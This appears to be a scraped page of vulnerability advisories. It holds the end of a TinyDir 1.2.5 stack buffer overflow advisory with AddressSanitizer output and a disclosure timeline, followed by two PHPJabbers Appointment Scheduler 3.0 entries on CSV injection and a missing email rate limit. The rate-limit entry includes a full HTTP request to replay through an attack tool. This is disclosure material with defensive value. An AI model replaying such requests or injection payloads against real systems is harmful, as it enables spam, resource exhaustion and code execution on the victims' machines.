      (longjmp and C++ exceptions *are* supported)  
SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 in __interceptor_strcpy  
Shadow bytes around the buggy address:  
  0x100023d8d780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d790: 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2  
  0x100023d8d7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2  
  0x100023d8d7b0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
=>0x100023d8d7d0: 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00  
  0x100023d8d7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
  0x100023d8d820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
Shadow byte legend (one shadow byte represents 8 application bytes):  
  Addressable:           00  
  Partially addressable: 01 02 03 04 05 06 07   
  Heap left redzone:       fa  
  Freed heap region:       fd  
  Stack left redzone:      f1  
  Stack mid redzone:       f2  
  Stack right redzone:     f3  
  Stack after return:      f5  
  Stack use after scope:   f8  
  Global redzone:          f9  
  Global init order:       f6  
  Poisoned by user:        f7  
  Container overflow:      fc  
  Array cookie:            ac  
  Intra object redzone:    bb  
  ASan internal:           fe  
  Left alloca redzone:     ca  
  Right alloca redzone:    cb  
  Shadow gap:              cc  
==2533==ABORTING  
```

--[ 5 - Affected products

TinyDir 1.2.5 and earlier versions are affected by the vulnerabilities  
discussed in this advisory.

--[ 6 - Remediation

TinyDir developers have released version 1.2.6 [3] that addresses the  
vulnerabilities discussed in this advisory.

Please check the official TinyDir channels for further information about  
fixes.

--[ 7 - Disclosure timeline

2023-11-30: Vulnerabilities reported via GitHub security advisories [4].  
2023-12-01: Proof of concept provided at the request of TinyDir developers.  
2023-12-02: Vulnerabilities fixed in TinyDir's master branch on GitHub.  
2023-12-03: TinyDir 1.2.6 released and GitHub advisory published.  
2023-12-04: GitHub issued CVE-2023-49287 and we published this advisory.

--[ 8 - Acknowledgements

We would like to thank TinyDir developers for triaging and quickly fixing  
the reported vulnerabilities.

--[ 9 - References

[1] https://github.com/cxong/tinydir  
[2] https://github.com/search?q=tinydir.h&type=code  
[3] https://github.com/cxong/tinydir/releases/tag/1.2.6  
[4] https://github.com/cxong/tinydir/security

Copyright (c) 2023 Marco Ivaldi and Humanativa Group. All rights reserved.

TinyDir 1.2.5 Buffer Overflow

PHPJabbers Appointment Scheduler version 3.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Appointment Scheduler v3.0 - CSV Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, MS Office 2010# CVE-2023-48841Descriptions:PHPJabbers Appointment Scheduler v3.0 is vulnerable to CSV injectionvulnerability which allows an attacker to execute remote code. Thevulnerability exists due to insufficient input validation on theUnique ID field in the Reservations list that is used to construct aCSV file.Steps to Reproduce:1. Login your panel.2. Go to Options Menu then click Language then click Labels section.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48841)

PHPJabbers Appointment Scheduler 3.0 CSV Injection

PHPJabbers Appointment Scheduler version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48840Descriptions:PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting.Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 426Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then Start Attack and check mail.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)

Tag

#git